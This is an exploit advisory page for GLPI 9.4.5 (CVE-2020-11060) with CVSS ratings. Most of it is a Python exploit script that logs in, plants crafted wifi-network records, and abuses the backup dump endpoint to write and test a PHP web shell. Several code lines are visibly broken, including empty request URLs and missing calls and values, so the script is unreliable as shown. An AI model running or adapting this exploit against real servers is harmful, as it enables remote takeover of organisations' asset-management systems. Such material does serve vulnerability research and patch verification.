GLPI 9.4.5 Remote Code Execution

Credit: Brian Peters
Risk: High
Local: No
Remote: Yes

CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: GLPI 9.4.5 - Remote Code Execution (RCE) # Exploit Author: Brian Peters # Vendor Homepage: # Software Link: # Version: < 9.4.6 # CVE: CVE-2020-11060 # Download a SQL dump and find the table offset for "wifinetworks" with # cat <sqlfile> | grep "CREATE TABLE" | grep -n wifinetworks # Update the offsettable value with this number in the create_dump function # The Nix/Win paths are based on defaults. You can use curl -I <url> and use md5sum to find the path based # on the Set-Cookie hash. #!/usr/bin/python import argparse import json import random import re import requests import string import sys import time from datetime import datetime from lxml import html class GlpiBrowser: def __init__(self, url, user, password, platform): self.url = url self.user = user self.password = password self.platform = platform self.session = requests.Session() self.session.verify = False requests.packages.urllib3.disable_warnings() def extract_csrf(self, html): return re.findall('name="_glpi_csrf_token" value="([a-f0-9]{32})"', html)[0] def get_login_data(self): r = self.session.get('{0}'.format(self.url), allow_redirects=True) csrf_token = self.extract_csrf(r.text) name_field = re.findall('name="(.*)" id="login_name"', r.text)[0] pass_field = re.findall('name="(.*)" id="login_password"', r.text)[0] return name_field, pass_field, csrf_token def login(self): try: name_field, pass_field, csrf_token = self.get_login_data() except Exception as e: print "[-] Login error: could not retrieve form data" sys.exit(1) data = { name_field: self.user, pass_field: self.password, "auth": "local", "submit": "Post", "_glpi_csrf_token": csrf_token } r ='{}/front/login.php'.format(self.url), data=data, allow_redirects=False) return r.status_code == 302 def wipe_networks(self, padding, datemod): r = self.session.get('') comment = r.content r = self.session.get('{0}/front/wifinetwork.php#modal_massaction_contentb5e83b3aa28f203595c34c5dbcea85c9'.format(self.url)) try: csrf_token = self.extract_csrf(r.text) except Exception as e: print "[-] Edit network error: could not retrieve form data" sys.exit(1) webpage = html.fromstring(r.content) links = webpage.xpath('//a/@href') for rawlink in links: if "wifinetwork.form.php?id=" in rawlink: rawlinkparts = rawlink.split("=") networkid = rawlinkparts[-1] print "Deleting network "+networkid data = { "entities_id": "0", "is_recursive": "0", "name": "PoC", "comment": comment, "essid": "RCE"+padding, "mode": "ad-hoc", "purge": "Delete permanently", "id": networkid, "_glpi_csrf_token": csrf_token, '_read_date_mod': datemod } r ='{}/front/wifinetwork.form.php'.format(self.url), data=data) def create_network(self, datemod): r = self.session.get('') comment = r.content r = self.session.get('{0}/front/wifinetwork.php'.format(self.url)) try: csrf_token = self.extract_csrf(r.text) except Exception as e: print "[-] Create network error: could not retrieve form data" sys.exit(1) data = { "entities_id": "0", "is_recursive": "0", "name": "PoC", "comment": comment, "essid": "RCE", "mode": "ad-hoc", "add": "ADD", "_glpi_csrf_token": csrf_token, '_read_date_mod': datemod } r ='{}/front/wifinetwork.form.php'.format(self.url), data=data) print "[+] Network created" print " Name: PoC" print " ESSID: RCE" def edit_network(self, padding, datemod): r = self.session.get('') comment = r.content #create the padding for the name and essid r = self.session.get('{0}/front/wifinetwork.php'.format(self.url)) webpage = html.fromstring(r.content) links = webpage.xpath('//a/@href') for rawlink in links: if "wifinetwork.form.php?id=" in rawlink: rawlinkparts = rawlink.split('/') link = rawlinkparts[-1] #edit the network name and essid r = self.session.get('{0}/front/{1}'.format(self.url, link)) try: csrf_token = self.extract_csrf(r.text) except Exception as e: print "[-] Edit network error: could not retrieve form data" sys.exit(1) rawlinkparts = rawlink.split("=") networkid = rawlinkparts[-1] data = { "entities_id": "0", "is_recursive": "0", "name": "PoC", "comment": comment, "essid": "RCE"+padding, "mode": "ad-hoc", "update": "Save", "id": networkid, "_glpi_csrf_token": csrf_token, "_read_date_mod": datemod } r ='{0}/front/wifinetwork.form.php'.format(self.url), data=data) print "[+] Network mofified" print " New ESSID: RCE"+padding def create_dump(self, shellname): path='' if self.platform == "Win": path="C:\\xampp\\htdocs\\pics\\" elif self.platform == "Nix": path="/var/www/html/glpi/pics/" #adjust offset number to match the table number for wifi_networks #this can be found by downloading a SQL dump and running cat <dumpname> | grep "CREATE TABLE" | grep -n "wifinetworks" r = self.session.get('{0}/front/backup.php?dump=dump&offsettable=312&fichier={1}{2}'.format(self.url, path, shellname)) print '[+] Shell: {0}/pics/{1}'.format(self.url, shellname) def shell_check(self, shellname): r = self.session.get('{0}/pics/{1}?0=echo%20asdfasdfasdf'.format(self.url, shellname)) print " Shell size: "+str(len(r.content)) if "asdfasdfasdf" in r.content: print "[+] RCE FOUND!" sys.exit(1) return len(r.content) def pwn(self): if not self.login(): print "[-] Login error" return else: print "[+] Logged in" #create timestamp now = datemod = now.strftime("%Y-%m-%d %H:%M:%S") #create comment payload tick=1 while True: #create random shell name letters = string.ascii_letters shellname = ''.join(random.choice(letters) for i in range(8))+".php" #create padding for ESSID padding = '' for i in range(1,int(tick)+1): padding+=str(i) self.wipe_networks(padding, datemod) self.create_network(datemod) self.edit_network(padding, datemod) self.create_dump(shellname) self.shell_check(shellname) print "\n" raw_input("Press any key to continue with the next iteration...") tick+=1 return if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("--url", help="Target URL", required=True) parser.add_argument("--user", help="Username", required=True) parser.add_argument("--password", help="Password", required=True) parser.add_argument("--platform", help="Win/Nix", required=True) args = parser.parse_args() g = GlpiBrowser(args.url, user=args.user, password=args.password, platform=args.platform) g.pwn()

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